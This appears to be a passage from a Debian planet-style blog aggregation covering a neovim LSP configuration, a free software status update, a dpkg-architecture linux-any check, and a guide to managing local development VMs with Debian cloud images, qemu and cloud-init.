With that configuration I keep my old vimrc (it is a little bit messy, but it works) and I use a lua configuration file for the language servers and some additional neovim plugins on the ~/.config/nvim/lua/config.lua file:
-- -----------------------
-- BEG: LSP Configurations
-- -----------------------
-- AWK (awk_ls)
require'lspconfig'.awk_ls.setup{}
-- Bash (bashls)
require'lspconfig'.bashls.setup{}
-- C/C++ (clangd)
require'lspconfig'.clangd.setup{}
-- CSS (cssls)
require'lspconfig'.cssls.setup{}
-- Docker (dockerls)
require'lspconfig'.dockerls.setup{}
-- Docker Compose
require'lspconfig'.docker_compose_language_service.setup{}
-- Golang (gopls)
require'lspconfig'.gopls.setup{}
-- Helm (helm_ls)
require'lspconfig'.helm_ls.setup{}
-- Markdown
require'lspconfig'.marksman.setup{}
-- Python (pyright)
require'lspconfig'.pyright.setup{}
-- Rust (rust-analyzer)
require'lspconfig'.rust_analyzer.setup{}
-- SQL (sqlls)
require'lspconfig'.sqlls.setup{}
-- Terraform (terraformls)
require'lspconfig'.terraformls.setup{}
-- TOML (taplo)
require'lspconfig'.taplo.setup{}
-- Typescript (ts_ls)
require'lspconfig'.ts_ls.setup{}
-- YAML (yamlls)
require'lspconfig'.yamlls.setup{
  settings = {
    yaml = {
      customTags = { "!reference sequence" }
    }
  }
}
-- -----------------------
-- END: LSP Configurations
-- -----------------------
-- ---------------------------------
-- BEG: Autocompletion configuration
-- ---------------------------------
-- Ref: https://github.com/neovim/nvim-lspconfig/wiki/Autocompletion
--
-- Pre requisites:
--
--   # Packer
--   git clone --depth 1 https://github.com/wbthomason/packer.nvim \
--      ~/.local/share/nvim/site/pack/packer/start/packer.nvim
--
--   # Start nvim and run :PackerSync or :PackerUpdate
-- ---------------------------------
local use = require('packer').use
require('packer').startup(function()
  use 'wbthomason/packer.nvim' -- Packer, useful to avoid removing it with PackerSync / PackerUpdate
  use 'neovim/nvim-lspconfig' -- Collection of configurations for built-in LSP client
  use 'hrsh7th/nvim-cmp' -- Autocompletion plugin
  use 'hrsh7th/cmp-nvim-lsp' -- LSP source for nvim-cmp
  use 'saadparwaiz1/cmp_luasnip' -- Snippets source for nvim-cmp
  use 'L3MON4D3/LuaSnip' -- Snippets plugin
end)
-- Add additional capabilities supported by nvim-cmp
local capabilities = require("cmp_nvim_lsp").default_capabilities()
local lspconfig = require('lspconfig')
-- Enable some language servers with the additional completion capabilities offered by nvim-cmp
local servers = { 'clangd', 'rust_analyzer', 'pyright', 'ts_ls' }
for _, lsp in ipairs(servers) do
  lspconfig[lsp].setup {
    -- on_attach = my_custom_on_attach,
    capabilities = capabilities,
  }
end
-- luasnip setup
local luasnip = require 'luasnip'
-- nvim-cmp setup
local cmp = require 'cmp'
cmp.setup {
  snippet = {
    expand = function(args)
      luasnip.lsp_expand(args.body)
    end,
  },
  mapping = cmp.mapping.preset.insert({
    ['<C-u>'] = cmp.mapping.scroll_docs(-4), -- Up
    ['<C-d>'] = cmp.mapping.scroll_docs(4), -- Down
    -- C-b (back) C-f (forward) for snippet placeholder navigation.
    ['<C-Space>'] = cmp.mapping.complete(),
    ['<CR>'] = cmp.mapping.confirm {
      behavior = cmp.ConfirmBehavior.Replace,
      select = true,
    },
    ['<Tab>'] = cmp.mapping(function(fallback)
      if cmp.visible() then
        cmp.select_next_item()
      elseif luasnip.expand_or_jumpable() then
        luasnip.expand_or_jump()
      else
        fallback()
      end
    end, { 'i', 's' }),
    ['<S-Tab>'] = cmp.mapping(function(fallback)
      if cmp.visible() then
        cmp.select_prev_item()
      elseif luasnip.jumpable(-1) then
        luasnip.jump(-1)
      else
        fallback()
      end
    end, { 'i', 's' }),
  }),
  sources = {
    { name = 'nvim_lsp' },
    { name = 'luasnip' },
  },
}
-- ---------------------------------
-- END: Autocompletion configuration
-- ---------------------------------
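Note that this configuration assumes the language servers themselves are already installed and available on the PATH. As a rough illustration only (common ways to obtain them, not necessarily how they were installed here), a few of the servers referenced above can be installed like this:
# Illustrative installation commands; package sources are assumptions, adjust as needed.
npm install -g bash-language-server            # bashls
pip install pyright                            # pyright
rustup component add rust-analyzer             # rust_analyzer
go install golang.org/x/tools/gopls@latest     # gopls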

Conclusion I guess I'll keep helix installed and try it again on some of my personal projects to see if I can get used to it, but for now I'll stay with neovim as my main text editor and learn the shortcuts to use it with the language servers.

1 January 2025

Guido Günther: Free Software Activities December 2024

Another short status update of what happened on my side last month. The larger blocks are the Phosh 0.44 release and landing the initial Cell Broadcast support in phosh; the rest is all just small bits of bug, fallout and regression fixing here and there, spread across phosh, phoc, phosh-mobile-settings, libphosh-rs, phosh-osk-stub, phosh-tour, pfs, xdg-desktop-portal-phosh, phog, Debian, git-buildpackage, wlr-randr, python-dbusmock, livi, Chatty, feedbackd, libadwaita and phosh-ev. Reviews This is not code by me but reviews of other people's code. The list is incomplete, but I hope to improve on this in the upcoming months. Thanks for the contributions! Help Development Thanks a lot to all those who supported my work on this in 2024. Happy new year! If you want to support my work see donations. Comments? Join the Fediverse thread

26 December 2024

Kentaro Hayashi: How to check what matches linux-any?

Usually Architecture: any is recommended in debian/control, except when upstream explicitly doesn't or won't support a given architecture. In practical use, linux-any is useful to exclude the hurd architectures. (Previously it was also useful to exclude kfreebsd.) Here is a simple script to check whether a specific architecture matches linux-any or not.
2024/12/28: UPDATE I've got feedback that the following command should be used. (Thanks Cyril Brulebois and Guillem Jover)
dpkg-architecture -L -W linux-any
or
dpkg-architecture --match-wildcard linux-any --list-known
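Building on that recommended command, a small sketch for checking a single architecture (hurd-amd64 below is just an example) is to grep the list of known matching architectures:
# Check whether one architecture matches linux-any by grepping the known matches.
arch=hurd-amd64
if dpkg-architecture --match-wildcard linux-any --list-known | grep -qx "$arch"; then
    echo "$arch matches linux-any"
else
    echo "$arch does NOT match linux-any"
fi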
NOTE: the following example is wrong, but I keep it as is as a record of what I did wrongly:
#!usr/bin/bash
TARGETS="
amd64
arm64
armel
armhf
i386
mips64el
ppc64el
riscv64
s390x
alpha
hppa
hurd-amd64
hurd-i386
loong64
m68k
powerpc
ppc64
sh4
sparc64
x32
"
for d in $TARGETS; do
    dpkg-architecture -i linux-any -a $d
    if [ $? -eq 0 ]; then
    echo -e "[\e[32m\e[40mOK\e[0m] $d is linux-any (dpkg-architecture -i linux-any -a $d)"
    else
    echo -e "[\e[31m\e[40mNG\e[0m] $d is NOT linux-any (dpkg-architecture -i linux-any -a $d)"
    fi
done
screenshot of shell script

20 December 2024

Noah Meyerhans: Local Development VM Management

A coworker asked recently about how people use VMs locally for dev work, so I figured I'd take a few minutes to write up a bit about what I do. There are many use cases for local virtual machines in software development and testing. They're self-contained, meaning you can make a mess of them without impacting your day-to-day computing environment. They can run different distributions, kernels, and even entirely different operating systems from the one you use regularly. Etc. They're also cheaper than cloud services and provide finer-grained control over the resources. I figured I'd share a little bit about how I manage different virtual machines in case anybody finds this useful. This is what works for me, but it won't necessarily work for you, or maybe you've already got something better. I've found this setup to be easy to work with, lightweight, and easy to evolve as my needs change.

Use short-lived VMs Rather than keeping a long-lived development VM around that you customize over time, I recommend automating the common customizations and provisioning new VMs regularly. If I'm working on reproducing a bug or testing a change prior to submitting it upstream, I'll do this work in a VM and delete the VM when I'm done. When provisioning VMs this frequently, though, walking through the installation process for every new VM is tedious and a waste of time. Since most of my work is done in Debian, I start with images generated daily by the cloud team. These images are available for multiple releases and architectures. The nocloud variant boots to a root prompt and can be useful directly, or the generic images can be used for cloud-init based customization.

Automating image preparation This makefile lets me do something like make image and get a new qcow2 image with the latest build of a given Debian release (sid by default, with others available by specifying DIST).
DATESTAMP=$(shell date +"%Y-%m-%d")
FLAVOR?=generic
ARCH?=$(shell dpkg --print-architecture)
DIST?=sid
RELEASE=$(DIST)
URL_PATH=https://cloud.debian.org/images/cloud/$(DIST)/daily/latest/
ifeq ($(DIST),trixie)
RELEASE=13
endif
ifeq ($(DIST),bookworm)
RELEASE=12
endif
ifeq ($(DIST),bullseye)
RELEASE=11
endif

# curl -LO saves the tarball under its release-numbered remote name,
# so the target uses $(RELEASE) to match.
debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz:
	curl --fail --connect-timeout 20 -LO \
	    $(URL_PATH)/debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz

$(DIST)-$(FLAVOR)-$(DATESTAMP).qcow2: debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz
	tar xvf debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz
	qemu-img convert -O qcow2 disk.raw $@
	rm -f disk.raw
	qemu-img resize $@ 20g
	qemu-img snapshot -c untouched $@

image: $(DIST)-$(FLAVOR)-$(DATESTAMP).qcow2
.PHONY: image
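Usage is then a plain make invocation, optionally overriding DIST (and ARCH or FLAVOR), and the "untouched" snapshot created in the last recipe step can later be used to roll a used image back to its pristine state. A small sketch; the qcow2 file name below is a placeholder, the real one carries the current datestamp:
make image                    # latest sid image
make image DIST=bookworm      # or a specific release
# Roll a used image back to the snapshot created at build time
qemu-img snapshot -a untouched sid-generic-2025-03-25.qcow2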

Customize the VM environment with cloud-init While the nocloud images can be useful, I typically find that I want to apply the same modifications to each new VM I launch, and they don't provide facilities for automating this. The generic images, on the other hand, run cloud-init by default. Using cloud-init, I can create my user account, point apt at local mirrors, install my preferred tools, ensure the root filesystem is resized to make full use of the backing storage, etc. The cloud-init configuration on the generic images will read from a local config drive, which can contain an ISO9660 (cdrom) filesystem image. This image can be generated from a subdirectory containing the various cloud-init input files using the following make syntax (a sketch of what the user_data itself might contain follows the rule):
IMDS_FILES=$(shell find seedconfig -path '*/.git/*' \
    -prune -o -type f -name '*.in.json' -print) \
    seedconfig/openstack/latest/user_data

seed.iso: $(IMDS_FILES)
	genisoimage -V config-2 -o $@ -J -R -m '*~' -m '.git' seedconfig
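The actual contents of seedconfig are not shown here. Purely as a sketch of the kind of customization described above (user creation, package installation, root filesystem growth), a minimal user_data could look like the following; every name and value is a placeholder rather than the real configuration:
mkdir -p seedconfig/openstack/latest
cat > seedconfig/openstack/latest/user_data <<'EOF'
#cloud-config
users:
  - name: dev                     # placeholder user
    sudo: ALL=(ALL) NOPASSWD:ALL
    shell: /bin/bash
packages:
  - git
  - build-essential
growpart:
  mode: auto
  devices: ['/']
EOF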
With the image in place, the VM can be created with
qemu-system-x86_64 -machine q35,accel=kvm \
    -cpu host -m 4g \
    -drive file=${img},index=0,if=virtio,media=disk \
    -drive file=seed.iso,media=cdrom,format=raw,index=2,if=virtio \
    -nic user -nographic
This invokes qemu with the root volume and ISO image attached as disks, uses an emulated q35 machine with the host's CPU and KVM acceleration, the userspace network stack, and a serial console. The first time the VM boots, cloud-init will apply the configuration from the cloud-config available in the ISO9660 filesystem.

Alternatives to cloud-init virt-customize is another tool that accomplishes the same type of customization. I use cloud-init because it works directly with cloud providers in addition to local VM images. You could also use something like ansible.
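For comparison, a hedged sketch of the equivalent customization with virt-customize (the image name, packages and user are illustrative, not the configuration used here):
# Modify the qcow2 image in place before first boot
virt-customize -a sid-generic-2025-03-25.qcow2 \
    --install git,build-essential \
    --run-command 'useradd -m -s /bin/bash dev'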

Variations I have a variant of this that uses a bridged network, which I'll write more about later. The bridge is nice because it's more featureful, with full support for IPv6, etc., but it needs a bit more infrastructure in place. It can also be helpful to use 9p or virtfs to share filesystem state between the host and the VM. I don't tend to rely on these, and will instead use rsync or TRAMP for moving files around. Containers are also useful, of course, and there are plenty of times when the full isolation of a VM is not worth the overhead.
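To give a flavour of the virtfs option mentioned above (a sketch only; the path and mount tag are arbitrary examples, not part of the setup described here), a host directory can be exported at VM launch and mounted from inside the guest:
# Host side: add a virtfs export to the qemu invocation shown earlier
qemu-system-x86_64 -machine q35,accel=kvm -cpu host -m 4g \
    -drive file=${img},index=0,if=virtio,media=disk \
    -virtfs local,path=$HOME/src,mount_tag=hostsrc,security_model=mapped-xattr \
    -nic user -nographic
# Guest side:
#   mount -t 9p -o trans=virtio,version=9p2000.L hostsrc /mnt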
